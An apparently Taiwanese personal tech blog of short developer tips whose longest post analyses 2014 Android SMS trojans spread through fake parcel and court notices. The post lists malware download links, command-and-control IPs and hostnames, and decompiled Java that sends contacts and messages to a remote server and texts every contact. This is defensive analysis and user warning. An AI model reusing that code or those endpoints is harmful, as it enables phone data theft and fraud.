Wednesday, February 16, 2022

Day of the Tentacle Remastered opening

Posted by at

Thursday, January 27, 2022

iphone photo path

iphone photo path 

/private/var/mobile/Media/DCIM/100APPLE/

Posted by at
Labels: , ,

Sunday, November 21, 2021

//test pre code block

 



//test pre code block

Posted by at

Friday, April 02, 2021

linux screen off

 #linux screen off:

DISPLAY=:0  xset dpms force off

#linux screen on:

DISPLAY=:0  xset dpms force on


Posted by at
Labels: , ,

Sunday, March 14, 2021

fix screen-x.tgz compile error: “configure: error: !!! no tgetent”

(ncurses-devel)

wget http://ftp.gnu.org/gnu/ncurses/ncurses-6.2.tar.gz

 

tar zxvf ncurses-6.2.tar.gz

 

cd ncurses-6.2

 

./configure --prefix=/usr/local/ncurses

 

make && make install

Posted by at
Labels: , , ,
Location: 台灣

Sunday, May 26, 2019

Project ERROR: Unknown module(s) in QT: multimedia multimediawidgets

Project ERROR: Unknown module(s) in QT: multimedia multimediawidgets

sudo apt-get install qtmultimedia5-dev 
  libqt5multimediawidgets5 
  libqt5multimedia5-plugins 
  libqt5multimedia5
 
Posted by at

Saturday, May 25, 2019

how to install opencv on ubuntu

https://linuxize.com/post/how-to-install-opencv-on-ubuntu-18-04/

sudo apt install build-essential cmake git pkg-config libgtk-3-dev
sudo apt install libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev
sudo apt install libjpeg-dev libpng-dev libtiff-dev gfortran openexr libatlas-base-dev
sudo apt install python3-dev python3-numpy libtbb2 libtbb-dev libdc1394-22-dev

mkdir ~/opencv_build && cd ~/opencv_build
git clone https://github.com/opencv/opencv.git
git clone https://github.com/opencv/opencv_contrib.git

If you want to install an older version of OpenCV, cd to both opencv and opencv_contrib directories and run git checkout

cd ~/opencv_build/opencv
mkdir build && cd build 

 cmake -D CMAKE_BUILD_TYPE=RELEASE \
    -D CMAKE_INSTALL_PREFIX=/usr/local \
    -D INSTALL_C_EXAMPLES=OFF \
    -D INSTALL_PYTHON_EXAMPLES=OFF \
    -D OPENCV_GENERATE_PKGCONFIG=ON \
    -D OPENCV_EXTRA_MODULES_PATH=~/opencv_build/opencv_contrib/modules \
    -D OPENCV_ENABLE_NONFREE=ON \
    -D BUILD_EXAMPLES=ON ..

 make
sudo make install
sudo ldconfig

pkg-config --modversion opencv4
Posted by at

Saturday, January 07, 2017

How do I fix my taskbar search in Windows 10?

How do I fix my taskbar search in Windows 10?

Restart Windows Explorer

A quick fix attempt, restarting Windows Explorer might jump-start the taskbar search into working again.
  1. Right-click the Start button.
  2. Click Task Manager.

  3. Click Windows Explorer. It's located near the bottom of the Task Manager menu.
  4. Click Restart.

Posted by at
Labels: , , , ,

Sunday, December 25, 2016

ffbe 速凍雪人覺醒級 非洲人

Posted by at

Sunday, December 04, 2016

cannot open include file qmemarray.h

cannot open include file qmemarray.h

fix:
use qwt6.1.3 (not 4.2.0)
https://sourceforge.net/projects/qwt/files/qwt/6.1.3/
Posted by at
Labels: ,

Saturday, December 03, 2016

mspdb100.dll couldn't be found by cl.exe

mspdb100.dll couldn't be found by cl.exe

mspdb100.dll lives in C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE

fix: 
"C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\vcvarsall.bat" x86
 
 
Posted by at
Labels: , , ,

Thursday, July 07, 2016

android display rotate 180 landscape 



android display rotate 180 landscape:


modify AndroidManifest.xml


android:screenOrientation="reverseLandscape"


complete:


android:name="xyz.com.demo.MainActivity"    


android:configChanges="orientation"    


android:label="@string/app_name"    


android:screenOrientation="reverseLandscape" 














Posted by



at
















Labels:
,
,
,
,
,
,

















          

        

          

        

Sunday, January 31, 2016


          

        









Delegation in Objective-C










1)Delegation in Objective-C

http://blog.eddie.com.tw/2013/05/24/delegation-in-objective-c/

2)Delegation

https://developer.apple.com/library/ios/documentation/General/Conceptual/DevPedia-CocoaCore/Delegation.html

3) IOS – 什麼是協定(PROTOCOL)與委派(DELEGATE)?

http://www.takobear.tw/2014/01/12/ios-protocoldelegate/

4) BEAR實驗室: XCODE製作互動元件 – UIBUTTON

http://www.takobear.tw/2014/01/12/bear-xcode-uibutton/

5)[Don IOS筆記] 研究delegate和protocol

http://blog.devdon.com/?p=2530

6)ios delegate你必須知道的事情

http://popcornylu.blogspot.tw/2011/07/delegate.html 

7)Developer's Note_ Protocol & Delegate

http://iosdevelopersnote.blogspot.tw/2010/11/protocol-delegate.html  









Posted by



at
















Labels:
,
,

















          

        

          

        

Saturday, January 30, 2016


          

        









android card ui










android card ui:
1)cardslib

https://github.com/gabrielemariotti/cardslib


2)Be a lazy but a productive android developer – Part 4 – Card UI
http://www.technotalkative.com/lazy-productive-android-developer-4/
https://dzone.com/articles/be-lazy-productive-android-2




3)Android Card Layout
http://myandroidtuts.blogspot.tw/2013/12/android-card-layout.html


4)Creating a "Card" UI
http://android-dev-tips-and-tricks.blogspot.tw/2014/02/creating-card-ui.html


5)How to create Google + cards UI in a list view?
http://stackoverflow.com/questions/17571118/how-to-create-google-cards-ui-in-a-list-view












Posted by



at
















Labels:
,
,

















          

        

          

        

Sunday, May 18, 2014


          

        










android 簡訊病毒:  










android 簡訊病毒: 



Step 1. 開啟「設定」,選擇「安全性」之後,再取消勾選「未知的來源」 (允許安裝非Market應用程式),如下圖:





經過這樣的設定之後,我們就只能從Google Play上安裝APP,就算去點擊了簡訊的goo.gl超連結,而下載到宅急便的憑證.apk檔案,也再一次不小心又按到了下載後的apk檔案,並且再一次不小心再去點擊了「程式安裝器」,你的手機在安裝時,都會直接將安裝程式給擋下,出現「安裝遭封鎖」的訊息,如下圖:





因此,從另一個角度來看,如果你希望安裝下載來的apk檔案,就必需去勾選這個「未知的來源」,才有辦法安裝。



取消「小額付費」的服務



話說這個小額付費的服務,對於一般人來說,似乎是沒什麼作用…



所以請打各自電信公司的客服,去停了它吧!就算沒有中毒,你也應該去停掉它…


    

  • 中華電信:手機直撥800,或0800080090客服專線
    • 

  • 台灣大哥大:手機直撥 188免費 或 02-66062999
    • 

  • 遠傳電信:手機直撥888/123 市話撥449-5888/449-5123
    • 




android 簡訊病毒號碼: 0912104628

android 簡訊病毒網址: http://goo.gl/4zjSLG

android 簡訊病毒內容: 您的法院訴訟



android 簡訊病毒網址: https://www.dropbox.com/s/l0lqzrtzqh2d6qd/%E9%80%9A%E7%9F%A5%E5%96%AE.apk











android 簡訊病毒號碼: 0955164020







android 簡訊病毒內容: 您的民事賠償





android 簡訊病毒網址: http://goo.gl/9Ofdu2




android 簡訊病毒網址: https://www.dropbox.com/s/09g745brshb6m73/%E9%80%9A%E7%9F%A5%E5%96%AE.apk



通知單.apk



流量分析: http://goo.gl/#analytics/goo.gl/9Ofdu2/all_time


















- Broadcast Receivers












com.example.google.service.MyDeviceAdminReceiver




intent-filter action:android.app.action.DEVICE_ADMIN_ENABLED












com.example.google.service.SMSServiceBootReceiver




intent-filter action:android.intent.action.BOOT_COMPLETED












com.example.google.service.SMSReceiver




intent-filter action:android.provider.Telephony.SMS_RECEIVED










TaskRequest
















- Required Permissions










android.permission.READ_PHONE_STATE


android.permission.SEND_SMS


android.permission.READ_SMS


android.permission.WRITE_SMS


android.permission.RECEIVE_SMS


android.permission.INTERNET


android.permission.READ_CONTACTS


android.permission.RECEIVE_BOOT_COMPLETED


















- Used Permissions












android.permission.SEND_SMS




method call:"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"


method call:"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"


method call:"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"


method call:"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"












android.permission.READ_PHONE_STATE




method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getLine1Number()Ljava/lang/String;"


method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getDeviceId()Ljava/lang/String;"


method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSimSerialNumber()Ljava/lang/String;"


method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSubscriberId()Ljava/lang/String;"












android.permission.VIBRATE




method call:"Landroid/support/v4/app/NotificationCompat$Builder/setDefaults(I)Landroid/support/v4/app/NotificationCompat$Builder;" calls"Landroid/app/Notification/Idefaults"


method call:"Landroid/support/v4/app/NotificationCompatHoneycomb/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap;)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"


method call:"Landroid/support/v4/app/NotificationCompatIceCreamSandwich/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"


method call:"Landroid/support/v4/app/NotificationCompatJellybean/(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z Z I Ljava/lang/CharSequence;)V" calls "Landroid/app/Notification/Idefaults"












android.permission.ACCESS_NETWORK_STATE




method call:"Landroid/support/v4/net/ConnectivityManagerCompat/getNetworkInfoFromBroadcast(Landroid/net/ConnectivityManager; Landroid/content/Intent;)Landroid/net/NetworkInfo;" calls "Landroid/net/ConnectivityManager/getNetworkInfo(I)Landroid/net/NetworkInfo;"


method call:"Landroid/support/v4/net/ConnectivityManagerCompatGingerbread/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"


method call:"Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"


method call:"Landroid/support/v4/net/ConnectivityManagerCompat$BaseConnectivityManagerCompatImpl/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"












android.permission.CHANGE_COMPONENT_ENABLED_STATE




method call:"Lcom/example/google/service/MainActivity/HideIcon()V" calls"Landroid/content/pm/PackageManager/setComponentEnabledSetting(Landroid/content/ComponentName; I I)V"












android.permission.WAKE_LOCK




method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager/newWakeLock(I Ljava/lang/String;)Landroid/os/PowerManager$WakeLock;"


method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/completeWakefulIntent(Landroid/content/Intent;)Z" calls"Landroid/os/PowerManager$WakeLock/release()V"


method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager$WakeLock/acquire(J)V"












android.permission.READ_CONTACTS




method call:"Lcom/example/google/service/ContactsHelper/getPhoneContactNumbers()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"


method call:"Lcom/example/google/service/ContactsHelper/getPhoneContacts()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"












android.permission.INTERNET




method call:"Lcom/example/google/service/HttpHelper/callWS(Ljava/lang/String;)Ljava/lang/String;" calls "Lorg/apache/http/impl/client/DefaultHttpClient/()V"
























- Used Features










android.hardware.telephony


android.hardware.touchscreen









net:

GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT

GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT

GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)



leak:

GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069108000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)



dns:

muc03s07-in-f14.1e100.net 



http:




Request: GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic;10


Response: 200 "OK"




Request: GET /sms/SMSHandler1.ashx?t=new


Response: 200 "OK"

Request: GET /sms/SMSHandler1.ashx?t=new



tcp:

173.194.44.14:443







android 簡訊病毒號碼: 0926566920

android 簡訊病毒內容: 宅急便 快遞

android 簡訊病毒網址: http://goo.gl/6yOcoV (無法下載)

android 簡訊病毒網址: https://www.dropbox.com/s/9llco6cqo0rxyup/%E6%86%91%E8%AD%89.apk?m=

2014-06-02 19:07:04 ERROR 509: Bandwidth Error.

流量分析: http://goo.gl/#analytics/goo.gl/6yOcoV/all_time







android 簡訊病毒號碼: 0933398720

android 簡訊病毒內容: 宅急便 快遞

android 簡訊病毒網址: http://goo.gl/6fs5jx  (已分析)

android 簡訊病毒網址: https://www.dropbox.com/s/rr5xv3qsn7815u0/%E9%9B%BB%E5%AD%90%E8%A1%A8%E5%96%AE.apk?m=

電子表單.apk

流量分析: http://goo.gl/#analytics/goo.gl/6fs5jx/all_time












- Native Libraries Loaded










Native Library Name


Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838


Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838









dns:




NameQuery TypeQuery ResultSuccessfulProtocol


ybbcel888.vicp.cc DNS_TYPE_A 220.136.223.64 udp 


ybbcel999.eicp.net DNS_TYPE_A 220.136.213.43 udp



tcp:220.136.223.64:9090




Ad-Aware  Android.Trojan.SMSSend.ND  20140602

AegisLab  SUSPICIOUS  20140602

AhnLab-V3  Android-Malicious/Litch  20140602

AntiVir  Android/SmsAgent.EB.Gen  20140602

Avast  Android:RuSMS-AH [Trj]  20140602

BitDefender  Android.Trojan.SMSSend.ND  20140602

DrWeb  Android.SmsBot.72.origin  20140602

ESET-NOD32  a variant of Android/TrojanSMS.Agent.ADD  20140602

Emsisoft  Android.Trojan.SMSSend.ND (B)  20140602

F-Secure  Trojan:Android/SmsSend.IE  20140601

GData  Android.Trojan.SMSSend.ND  20140602

Kaspersky  HEUR:Trojan-Spy.AndroidOS.SmForw.al  20140602

MicroWorld-eScan  Android.Trojan.SMSSend.ND  20140602

Sophos  Andr/SMSSend-EC



android 簡訊病毒號碼: 0961267359

android 簡訊病毒內容: 宅急便 快遞

android 簡訊病毒網址: http://goo.gl/58ooGF (無法下載)

android 簡訊病毒網址: https://www.dropbox.com/s/iweqcsh4vp9g5f3/%E6%86%91%E8%AD%89.apk?m=

憑證.apk

http://goo.gl/#analytics/goo.gl/58ooGF/all_time











Error (509)

This account's public links are generating too much traffic and have been temporarily disabled!



android 簡訊病毒內容:  黑貓宅急便

android 簡訊病毒網址:  http://goo.gl/em7bab   (已分析)

[application/vnd.android.package-archive]

android 簡訊病毒網址:  https://www.dropbox.com/s/plym2gpyohf9n7a/%E6%86%91%E8%AD%89.apk?m=

http://goo.gl/#analytics/goo.gl/em7bab/all_time












- Native Libraries Loaded










Native Library Name


Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838


Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838









dns:




NameQuery TypeQuery ResultSuccessfulProtocol


ybbcel999.eicp.net DNS_TYPE_A 61.228.130.24 udp 


ybbcel888.vicp.cc DNS_TYPE_A 220.136.213.160 udp



android 簡訊病毒內容:  黑貓宅急便(2)

 android 簡訊病毒網址: http://goo.gl/SOkMHW   (已分析)

android 簡訊病毒網址:  https://www.dropbox.com/s/zv1f6h6rezcuttt/%E6%86%91%E8%AD%89.apk

http://goo.gl/#analytics/goo.gl/SOkMHW/all_time












- Native Libraries Loaded










Native Library Name


Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838


Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838









dns:




NameQuery TypeQuery ResultSuccessfulProtocol


buyaoa1.vicp.co DNS_TYPE_A 111.249.169.13 udp 


yemian3.vicp.co DNS_TYPE_A 220.136.220.151 udp



tcp:111.249.169.13:9090



android 簡訊病毒內容:  張瑞芬您申請網上支付電費

android 簡訊病毒網址:  http://goo.gl/k0jo8D   (已分析)

[application/vnd.android.package-archive]

http://goo.gl/#analytics/goo.gl/k0jo8D/all_time












- Native Libraries Loaded










Native Library Name


Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838


Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838









dns:








NameQuery TypeQuery ResultSuccessfulProtocol


ybbcel999.eicp.net DNS_TYPE_A 61.228.130.220 udp 


ybbcel888.vicp.cc DNS_TYPE_A 61.228.131.215 udp











android 簡訊病毒內容:  您的快遞簽收通知單

android 簡訊病毒網址:  http://goo.gl/1MN94O   (已分析)

android 簡訊病毒網址:  https://www.dropbox.com/s/62556lg017ht0du/%E9%80%9A%E7%9F%A5%E5%96%AE.apk

http://goo.gl/#analytics/goo.gl/1MN94O/all_time












- Native Libraries Loaded










Native Library Name


Trying to load lib /data/data/msc.switchlib.act/lib/libbsvsv.so 0x40516898


Trying to load lib /data/data/msc.switchlib.act/lib/libbsomd.so 0x40516898









dns:






NameQuery TypeQuery ResultSuccessfulProtocol


xdynfa.vicp.co DNS_TYPE_A 211.20.68.250 


boyiis.iego.cn DNS_TYPE_A 114.25.31.243 


android.clients.google.com DNS_TYPE_A 173.194.116.162 173.194.116.163 173.194.116.164 173.194.116.165 173.194.116.166 173.194.116.167 173.194.116.168 173.194.116.169 173.194.116.174 173.194.116.160 173.194.116.161 


162.116.194.173.in-addr.arpa DNS_TYPE_PTR 





service:




TimestampService Name


3.232com.android.vending.util.WorkService


3.232com.android.vending.util.WorkService


11.234msc.switchlib.act.BaseService


22.241com.android.music.MediaPlaybackService


23.236com.android.music.MediaPlaybackService


23.237com.android.music.MediaPlaybackService


24.241com.android.music.MediaPlaybackService


24.242com.android.music.MediaPlaybackService


25.237com.android.music.MediaPlaybackService


30.232com.android.music.MediaPlaybackService


31.237com.android.music.MediaPlaybackService


60.249com.android.music.MediaPlaybackService


60.249com.android.music.MediaPlaybackService


72.252msc.switchlib.act.BaseService


78.253msc.switchlib.act.BaseService


162.486com.android.mms.transaction.SmsReceiverService


162.487com.android.mms.transaction.SmsReceiverService


167.490msc.switchlib.act.BaseService


179.985msc.switchlib.act.BaseService


179.986msc.switchlib.act.BaseService


179.986com.android.email.service.EmailBroadcastProcessorService


179.986com.android.email.service.EmailBroadcastProcessorService


179.986com.google.android.gsf.checkin.CheckinService


179.986com.google.android.gsf.checkin.CheckinService


179.986com.android.exchange.SyncManager


180.991com.google.android.gsf.update.SystemUpdateService


180.991com.google.android.gsf.update.SystemUpdateService


180.991com.google.android.partnersetup.AppHiderService


180.992com.google.android.partnersetup.AppHiderService


180.992com.android.providers.downloads.DownloadService


180.992com.android.providers.downloads.DownloadService


181.986com.android.mms.transaction.SmsReceiverService


181.986com.android.mms.transaction.SmsReceiverService


181.986com.android.providers.media.MediaScannerService


181.986com.android.providers.media.MediaScannerService


181.986com.android.vending.util.AlarmService


181.986com.android.vending.util.AlarmService


182.991com.android.providers.calendar.EmptyService


182.991com.android.bluetooth.opp.BluetoothOppService


182.991com.android.bluetooth.opp.BluetoothOppService


182.991com.google.android.gm.MailIntentService


182.992com.google.android.gm.MailIntentService


182.992com.google.android.gm.downloadprovider.DownloadService


182.992com.google.android.gm.downloadprovider.DownloadService


187.998com.google.android.gsf.checkin.CheckinService


187.998com.google.android.gsf.checkin.CheckinService


187.998com.google.android.gsf.update.SystemUpdateService


187.998com.google.android.gsf.update.SystemUpdateService


189.998com.google.android.partnersetup.AppHiderService


189.999com.google.android.partnersetup.AppHiderService


197.993com.google.android.gsf.checkin.CheckinService


197.993com.google.android.gsf.checkin.CheckinService


197.993com.google.android.gsf.checkin.EventLogService


197.993com.google.android.gsf.checkin.EventLogService


197.993com.android.providers.calendar.EmptyService


197.993com.google.android.gsf.checkin.EventLogService


197.994com.google.android.gsf.checkin.EventLogService


207.413com.google.android.gsf.checkin.CheckinService


207.413com.google.android.gsf.checkin.CheckinService


207.413com.google.android.gsf.update.SystemUpdateService


207.413com.google.android.gsf.update.SystemUpdateService


209.412com.google.android.partnersetup.AppHiderService


209.412com.google.android.partnersetup.AppHiderService



android 簡訊病毒內容:  宅急便快遞通知

android 簡訊病毒網址:  wget http://goo.gl/6U6J3B  (無法下載)

android 簡訊病毒網址:  https://www.dropbox.com/s/g4c8e9zp8dqqhk5/%E6%86%91%E8%AD%89.apk?m=

ERROR 509: Bandwidth Error.

http://goo.gl/#analytics/goo.gl/6U6J3B/all_time







android 簡訊病毒內容:  瑞芬找到你了

android 簡訊病毒網址:  wget http://goo.gl/976Zaj (無法下載)

android 簡訊病毒網址:  http://211.44.3.186/11/index.php

http://goo.gl/#analytics/goo.gl/976Zaj/all_time









用電腦開時,他會去判斷這是電腦,所以就導到新聞網頁去



但如果用手機開啟,就會讓你下載apk檔







再來分析一下註冊的IP



211.44.3.186



經過whois的查詢



是註冊在 Korea Network infomation Center(韓國網路資訊中心)







想也知道宅配公司怎麼可能會用韓國的IP







android 簡訊病毒內容:  您正在申請網上支付電費

android 簡訊病毒網址:  wget http://goo.gl/UB9zBa (無法下載)

android 簡訊病毒網址:  http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk

通知單.apk

http://goo.gl/#analytics/goo.gl/UB9zBa/all_time













詐騙簡訊內容:您正在申請網上支付103年2月電費共計367元, 若非本人操作, 請查看電子憑證進行取消 http://goo.gl/UB9zBa 









點選會到http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk下載apk,若開啟安裝,則出現:







資安分析:













1. 這隻惡意apk可以讀取手機:通訊錄朋友的姓名電話、簡訊SMS訊息,會把使用者的手機號碼上傳至203.69.59.153 這一個IP:



[GET] http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=[TelNum]





2. IP使用whois系統查詢 http://www.whois365.com/tw/ip/203.69.59.153 



顯示為中華電信所管轄的IP,可能是客戶租用的IP主機被駭?





3. 駭客持續的攻擊分佈集中在下述日期:3/26:1706次、3/31:2946次、4/3:3873次、4/7:4869次。 目前總計超過31000次。(以上數字依照使用者點選短網址統計報表,但有警覺性的使用者,真實攻擊次數更多)直至本篇截稿前,該被駭IP的網路服務仍然存在。







  



最近非常夯的簡訊病毒,很多朋友都有收到這樣的簡訊,我的 Android 手機也收到好幾次, 

不過,既然自己接觸 Android 也有不短的時間了,那就剛好發揮一下專業來看看這個病毒到底會做些什麼事情。

Android APK 程式包裝是著名的容易反組譯,幾年前也剛好有個很強的反組譯軟體dex2jar 出現,搭配 JD-GUI 還能很容易的看到反組譯出來的原始碼,大家有興趣也可以試試看。



如果想要知道怎麼反組譯,可以參考下面的步驟,



1. 安裝好 dex2jar  JD-GUI

2.  command line 執行

        $> dex2jar.sh apkfile



    這樣會在資料夾內產生一個名為 apkfile_dex2jar.jar 的檔案

3.  JD-GUI 打開該檔案就可以看到原始碼



-----

下面總結一下這個簡訊病毒的相關實作細節,



這個病毒會取得下面這些權限,







   
android.permission.READ_PHONE_STATE



   
android.permission.SEND_SMS



   
android.permission.READ_SMS



   
android.permission.WRITE_SMS



   
android.permission.RECEIVE_SMS



   
android.permission.INTERNET



   
android.permission.CALL_PHONE



   
android.permission.READ_CONTACTS



   
android.permission.WRITE_EXTERNAL_STORAGE



   
com.android.launcher.action.INSTALL_SHORTCUT





這些權限都是跟簡訊和聯絡人資料有關,跟我們所知道的病毒行為相符。



我們從 AndroidManifest.xml 可以看得出來它有三個關鍵組件,



   
    ".SMSServices">



   
        



   
            "com.example.android.services.SMSServices" />



   
        





   
    





   
    "SMSServiceBootReceiver">



   
        



   
            "android.intent.action.BOOT_COMPLETED" />



   
        





   
    









   
     android:name="SMSSender" />





每次手機開機,SMSServiceBootReceiver 都會收到 Broadcast,裡面的行為就是啟動 SMSService,所以手機重開機也無法停止病毒的行動。



public class SMSServiceBootReceiver
extends BroadcastReceiver



{



  public void onReceive(Context
paramContext, Intent paramIntent)



  {



    Intent
localIntent = new Intent();



    localIntent.setAction("com.example.android.services.SMSServices");



    paramContext.startService(localIntent);



  }



}







這個病毒的預設起始元件是 MainActivity,剛啟動時會去檢查是不是用 Emulator 執行該 APK,看來是怕被 try 病毒行為,可能也跟他的 Server 有關係吧。



剛剛有提到手機開機就會去執行 SMSService,另外,一旦我們執行這個程式後,SMSService 也會被啟動,基本上就是要確保 SMSService 能夠被運行起來。



 SMSService 裡面會啟動 SMSObserver  SMSSender,接下來我們再來看這幾個部分。



SMSObserver 的部分,他會去看你的簡訊收件匣裡面所有未讀的簡訊,並把你收到的簡訊內容截取出來,最後將這些簡訊的內容送出到遠端 Server,內容會包含下面幾個資訊,







·                    
你自己的手機號碼



·                    
來訊者的手機號碼



·                    
訊息內容



·                    
訊息傳送時間



傳送到遠端 Server 的方式,看起來是一台 Microsoft-IIS/7.0 Server,似乎是用 ASP.NET 寫的 WebService,下面是他傳送到 Server  format,使用 GET operation,基本上,後續的相關行為都會傳到該 Server,而且 Server 會回傳一些內容,作為 Client 的使用,但我嘗試用 Postman 送些 Request 過去,似乎沒有接到任何回傳,Server 可能有擋一些濫用 API 的行為,但也可能是我下的 Http Request 格式還是有問題吧。







        http://101.55.13.43/sms/SMSHandler.ashx?t=r&p=你的手機號碼&a=朋友的手機號碼&m=訊息內容&d=傳送時間







這樣的 Request 出去實在很可怕,遠端 Server 應該會把這些資料都記起來,又可以再販賣個資,也可以作為日後發送簡訊的內容參考,甚至是增進社交工程的技術,現在透過網際網路,所有資訊的流通都很迅速,經由連網裝置,一旦有機可乘,就能很容易地竊取到私密資料,太可怕了。







SMSSender 的部分,它被啟動時,會去運行 Contact class 裡面的程式碼,



public
void Send()



  throws UnsupportedEncodingException,
ParserConfigurationException, InterruptedException



{



  ArrayList localArrayList
= new ContactsHelper(this._Context).GetAllContacts();



  WebServiceCalling
localWebServiceCalling = new WebServiceCalling(this._Context);



  String str1 =
Tools.getPhoneNumber(this._Context);



  String str2 =
"";



  Iterator localIterator =
localArrayList.iterator();



  while (true)



  {



    if (!localIterator.hasNext())



    {



      if (str2.length() > 0)



        localWebServiceCalling.SC(null,
str1, str2);



      return;



    }



    String str3 =
(String)localIterator.next();



    str2 = str2 +
"," +
str3;



    if (str2.length() > 20)



    {



      localWebServiceCalling.SC(null,
str1, str2);



      str2
= "";



    }



  }



}







這部分會去看你手機上的通訊錄,把通訊錄上所有聯絡人都擷取出來,然後傳送到遠端 Server,傳送內容會包含,



·                    
你自己的手機號碼



·                    
聯絡人名稱



·                    
聯絡人手機號碼



另外,它也會傳送簡訊給其他聯絡人,



localSmsManager.sendTextMessage(str8.trim(), null, str9,
null, null);



  localWebServiceCalling.log("SMS",
"S", str1, str8 + "|" + str9);







60秒它就會傳送你的聯絡人資料到遠端 Server 並傳送簡訊給其他聯絡人,







public static void sendUpdateBroadcastRepeat(Context paramContext)



{



  PendingIntent localPendingIntent =
